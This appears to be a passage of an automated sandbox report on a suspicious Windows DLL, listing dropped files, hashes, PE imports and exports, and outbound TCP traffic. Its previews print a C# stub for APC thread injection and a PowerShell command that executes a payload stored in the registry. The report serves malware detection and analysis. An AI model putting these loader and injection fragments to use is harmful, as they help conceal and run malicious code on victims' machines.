MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\uio4qdnj.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	415
Entropy (8bit):	5.038565598056225
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ0mMRSR7a18lpP6tkSRa+rVSSRnA/fl81N4IkgsOFQy:V/DTLDfuCMLh6tv9rV5nA/61N43gszy
MD5:	820D67D86E4D2F141C62A2F02F457875
SHA1:	0F597E389BE20591567742E9333D19419947B3CD
SHA-256:	0DECFD511470CAB8EF7D4A45A891B8D3C8A7ABA782190C2777E2A2048F82A3CD
SHA-512:	B05C022573C3EA6D9BC39C6E6E38DD33EC63D55F9793E6F5367E1EBA8493C33FFA28EB5989881EC82EE898F117D616FD1FE2A68E7FBF345209E8A61CBBFCCB61
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class nrahxbk. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr bjvmnbdtfa,IntPtr tvxroymffj,IntPtr xig);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint bbqximxsfm,uint leqlyn,IntPtr axhxmnupohp);.. }..}.

C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.268750609128095
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f9KHzxs7+AEszIWXp+N23f9KoyA:p37Lvkmb6KHl0WZE8lz9
MD5:	49F0BD0679BF1D1C64609BEC9FF0E9A8
SHA1:	891088F1D52E4CBA1FC00275C138412B721B3AA9
SHA-256:	4850FD4D357E5351C8262D82A388985B2B2B981B101052EB731D5B5D26BF8A98
SHA-512:	3DCCB541CD36CCD5AC5537E7E3843E158760817BACE3C8BBABF6CF7BAB13CDE2EE95AC1DC3FB4A442FFE855502004AA92246FD912E4E118BA5723AA85E1592DA
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uio4qdnj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uio4qdnj.0.cs"

C:\Users\user\AppData\Local\Temp\uio4qdnj.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6373866366749064
Encrypted:	false
SSDEEP:	48:6Im65J7+ikLLuu0SJmUqgX1uljua36tq:Q65J7yLhhIpuK6
MD5:	97E33B4529706F244A7CC47FEF8277AE
SHA1:	947DC04DF356F47448FC32D5EE745596473B0F59
SHA-256:	E0C3FB85273C41F45A2A3DF4ADECFBAF8C3A69DA3255A2E3065026F3EFB2CA15
SHA-512:	49366788F7963F742735F04691E4EFC9427CBED09B7B9883B599CFABFBF2E47303B21B2D4D555596334C5D394BAED8289B7DD848798C0F71502AA2263B2A297E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...............)...................................... :............ G............ Z.....P ......e.........k.....v...........................e. ...e...!.e.%...e............3.<.....:.......G.......Z.......................................#........<Module>.uio4qdnj.dll.nrahxbk.W32.mscorlib.

C:\Users\user\AppData\Local\Temp\uio4qdnj.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xU5QnXMG.20211008064622.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1195
Entropy (8bit):	5.320686932671721
Encrypted:	false
SSDEEP:	24:BxSAIxvBnD+x2DOXUWOLCHGI4XWrHjeTKKjX4CIym1ZJXWOLCHGI4SnxSAZn:BZcvhKoORF4GrqDYB1ZcF4UZZn
MD5:	8AF4A446FD74F106B3927FD02E153053
SHA1:	0C5A039AC8E3712945A48112494E3209ED7F619A
SHA-256:	29DA2D3F7E72FFC0EAE80A9BE479BFA51450B70D9E0F7EC3B4090A3603E2B1AD
SHA-512:	60EC0EE0ACD4EBD70CDD3BB2277D456169A9DF53A8D0B13855F46F0DB97DEBD13ED9E6B0D738900E7C094CB3F3F210CA1ADDA1E834B08C63996A0953448FCF25
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211008064622..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5480..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211008064622..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..****************

C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xd8ptVim.20211008064618.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1195
Entropy (8bit):	5.322193987487182
Encrypted:	false
SSDEEP:	24:BxSAdxvBnD+x2DOXUWOLCHGI4XWetHjeTKKjX4CIym1ZJXPOLCHGI4znxSAZS:BZ/vhKoORF4G8qDYB1Z/F4TZZS
MD5:	8E619B398098C24D77705A3469300C9C
SHA1:	25DFE5320E20672519A43CF9C45E1B8FF38CBD4D
SHA-256:	60B3C46DFE1B6F20597588DA9B4ACB49651019D3CAEBD9015EC86158D392C6E1
SHA-512:	6213A342205E2AB3285F6957EFF5620C1E2EAB02D2E0DFAC335C7833709DB80714DC93E913E451C93797C985D1AF9F8C6FB7BE01EE7A06CB637E6C8FE43175F9
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211008064618..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 6972..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211008064618..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..****************

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.437180554827025
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	uT9rwkGATJ.dll
File size:	662688
MD5:	9a453cc31ebfca29d8df565258fbf8ce
SHA1:	5eb3be88abb84f63e04c92bc3e35a82a01689971
SHA256:	eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
SHA512:	c916ced5af88b060550b24f1136b5f6e3fde45207cdad721709eb209e706ae40bca9bd230ebf79d83981258ba674993b7f47174f91272358bd5ffe2db40e64b0
SSDEEP:	12288:6vWBEPfqPoo44cvquI2Pg/8wsPrcPgIDU1Iu3vEI8Vck+5gS2oQkoKeyFtseQOYc:6v5Pbo4ZgaPrOpI1IkvIVc1qDoQko/yz
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SQ...0...0...0..rV...0..rV..j0..rV...0..._...0..._...0....s..0...0..`0..._...0..._...0..._\|..0..._...0..Rich.0..........PE..L..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1001f336
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F733B58 [Tue Sep 29 13:49:12 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	8d2de2ae605a2294ac6efde10e33795a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F2030D59067h
call 00007F2030D5965Eh
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F2030D58F13h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [100320BCh]
push dword ptr [ebp+08h]
call dword ptr [100320B8h]
push C0000409h
call dword ptr [100320C0h]
push eax
call dword ptr [100320C4h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007F2030D69D49h
test eax, eax
je 00007F2030D59067h
push 00000002h
pop ecx
int 29h
mov dword ptr [1009CBC8h], eax
mov dword ptr [1009CBC4h], ecx
mov dword ptr [1009CBC0h], edx
mov dword ptr [1009CBBCh], ebx
mov dword ptr [1009CBB8h], esi
mov dword ptr [1009CBB4h], edi
mov word ptr [1009CBE0h], ss
mov word ptr [1009CBD4h], cs
mov word ptr [1009CBB0h], ds
mov word ptr [1009CBACh], es
mov word ptr [1009CBA8h], fs
mov word ptr [1009CBA4h], gs
pushfd
pop dword ptr [1009CBD8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [1009CBCCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [1009CBD0h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x9ac20	0xac	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9accc	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9ae000	0x428	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9af000	0x1b80	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x99940	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x99998	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32000	0x1d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30dfc	0x30e00	False	0.680766464194	data	6.73243552493	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x32000	0x69670	0x69800	False	0.573033915877	data	4.48456725744	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9c000	0x911328	0xc00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x9ae000	0x428	0x600	False	0.287109375	data	2.49030754887	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9af000	0x1b80	0x1c00	False	0.796595982143	data	6.63506997151	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x9ae060	0x3c4	data	English	United States

Imports

DLL	Import
KERNEL32.dll	GetVolumeInformationW, VirtualProtect, EnterCriticalSection, GetModuleFileNameW, InitializeCriticalSection, GetTempPathW, CreateFileW, GetVersionExW, GetSystemDirectoryW, FindFirstChangeNotificationW, OpenProcess, LockResource, GetCurrentDirectoryW, GetWindowsDirectoryW, GetModuleHandleW, GetSystemTime, QueryPerformanceCounter, GetDateFormatW, WriteConsoleW, CloseHandle, SetFilePointerEx, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, GetStringTypeW, GetFileType, GetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, EnumSystemLocalesW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, DecodePointer
WS2_32.dll	gethostbyname, shutdown, WSAStartup, getpeername, getsockname, send, socket, ntohs, getservbyname, recvfrom, recv, htonl, htons, sendto, setsockopt, WSACleanup
WININET.dll	InternetCanonicalizeUrlW, InternetConnectW, InternetGetLastResponseInfoW, InternetCloseHandle, HttpOpenRequestW, InternetOpenW, HttpQueryInfoW, InternetOpenUrlW, InternetQueryDataAvailable, InternetSetOptionExW, InternetCrackUrlW, HttpSendRequestW, InternetSetStatusCallbackW, InternetWriteFile, InternetReadFile

Exports

Name	Ordinal	Address
Camptiny	1	0x1001cb80
Consonantget	2	0x1001ccb0
LongSubstance	3	0x1001caf0
Rangetown	4	0x1001cc80
Scoreplay	5	0x1001ce90
Visit	6	0x1001cce0

Version Infos

Description	Data
LegalCopyright	Laugh Ranhear person Corporation. All rights reserved
InternalName	Logice Radiocorner
FileVersion	8.2.6.941
CompanyName	Laugh Ranhear person Corporation Minescale
ProductName	Laugh Ranhear person Evenseat Sailmiss
ProductVersion	8.2.6.941
FileDescription	Laugh Ranhear person Evenseat Sailmiss
OriginalFilename	Teach.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2021 06:45:26.600399971 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:26.600461960 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:26.600564957 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:26.608392954 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:26.608432055 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.063493967 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.063595057 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:27.068871975 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:27.068896055 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.069401026 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.228650093 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:27.289676905 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:27.335153103 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.438730001 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.438791037 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.438916922 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:27.439054012 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:27.439075947 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.439133883 CEST	49754	443	192.168.2.3	40.97.156.114
Oct 8, 2021 06:45:27.439146996 CEST	443	49754	40.97.156.114	192.168.2.3
Oct 8, 2021 06:45:27.464658976 CEST	49755	443	192.168.2.3	52.98.208.114
Oct 8, 2021 06:45:27.464709997 CEST	443	49755	52.98.208.114	192.168.2.3
Oct 8, 2021 06:45:27.464792013 CEST	49755	443	192.168.2.3	52.98.208.114
Oct 8, 2021 06:45:27.465646982 CEST	49755	443	192.168.2.3	52.98.208.114
Oct 8, 2021 06:45:27.465676069 CEST	443	49755	52.98.208.114	192.168.2.3
Oct 8, 2021 06:45:27.563524008 CEST	443	49755	52.98.208.114	192.168.2.3
Oct 8, 2021 06:45:27.563625097 CEST	49755	443	192.168.2.3	52.98.208.114
Oct 8, 2021 06:45:27.565572977 CEST	49755	443	192.168.2.3	52.98.208.114
Oct 8, 2021 06:45:27.565601110 CEST	443	49755	52.98.208.114	192.168.2.3
Oct 8, 2021 06:45:27.570905924 CEST	443	49755	52.98.208.114	192.168.2.3
Oct 8, 2021 06:45:27.573955059 CEST	49755	443	192.168.2.3	52.98.208.114
Oct 8, 2021 06:45:27.601692915 CEST	443	49755	52.98.208.114	192.168.2.3
Oct 8, 2021 06:45:27.601761103 CEST	443	49755	52.98.208.114	192.168.2.3
Oct 8, 2021 06:45:27.601859093 CEST	49755	443	192.168.2.3	52.98.208.114
Oct 8, 2021 06:45:27.601986885 CEST	49755	443	192.168.2.3	52.98.208.114
Oct 8, 2021 06:45:27.602010965 CEST	443	49755	52.98.208.114	192.168.2.3
Oct 8, 2021 06:45:27.626440048 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.626493931 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.626591921 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.627329111 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.627357006 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.726604939 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.726694107 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.728822947 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.728843927 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.729233027 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.731389046 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.775171041 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.783435106 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.783607006 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.783667088 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.783791065 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.783809900 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:27.783845901 CEST	49756	443	192.168.2.3	52.97.151.18
Oct 8, 2021 06:45:27.783857107 CEST	443	49756	52.97.151.18	192.168.2.3
Oct 8, 2021 06:45:31.579452991 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:31.579493999 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:31.579586983 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:31.584486961 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:31.584502935 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:32.105117083 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:32.105273962 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:32.108359098 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:32.108381987 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:32.108710051 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:32.150989056 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:32.555356026 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:32.599149942 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:32.725969076 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:32.726056099 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:32.730325937 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:32.733315945 CEST	49764	443	192.168.2.3	40.97.160.2
Oct 8, 2021 06:45:32.733340025 CEST	443	49764	40.97.160.2	192.168.2.3
Oct 8, 2021 06:45:32.773565054 CEST	49765	443	192.168.2.3	40.101.9.178
Oct 8, 2021 06:45:32.773619890 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.785016060 CEST	49765	443	192.168.2.3	40.101.9.178
Oct 8, 2021 06:45:32.791428089 CEST	49765	443	192.168.2.3	40.101.9.178
Oct 8, 2021 06:45:32.791455030 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.889491081 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.889511108 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.894906998 CEST	49765	443	192.168.2.3	40.101.9.178
Oct 8, 2021 06:45:32.916502953 CEST	49765	443	192.168.2.3	40.101.9.178
Oct 8, 2021 06:45:32.916527033 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.916889906 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.921912909 CEST	49765	443	192.168.2.3	40.101.9.178
Oct 8, 2021 06:45:32.955389977 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.955476999 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.955548048 CEST	49765	443	192.168.2.3	40.101.9.178
Oct 8, 2021 06:45:32.955708981 CEST	49765	443	192.168.2.3	40.101.9.178
Oct 8, 2021 06:45:32.955728054 CEST	443	49765	40.101.9.178	192.168.2.3
Oct 8, 2021 06:45:32.986630917 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:32.986685038 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:32.986800909 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:32.987714052 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:32.987731934 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:33.093559980 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:33.093661070 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:33.096313000 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:33.096330881 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:33.096762896 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:33.098668098 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:33.139219046 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:33.155735970 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:33.155827999 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:33.155919075 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:33.156188011 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:33.156204939 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:45:33.156250000 CEST	49766	443	192.168.2.3	52.97.178.98
Oct 8, 2021 06:45:33.156259060 CEST	443	49766	52.97.178.98	192.168.2.3
Oct 8, 2021 06:46:08.082357883 CEST	49828	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:08.082403898 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.082520008 CEST	49828	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:08.083034039 CEST	49828	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:08.083060026 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.195158005 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.195290089 CEST	49828	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:08.197441101 CEST	49828	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:08.197463036 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.197731972 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.199604034 CEST	49828	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:08.247142076 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.288815022 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.288851023 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.288872957 CEST	443	49828	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:08.289009094 CEST	49828	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:08.289041996 CEST	443	49828	193.29.104.83	192.168.2.3
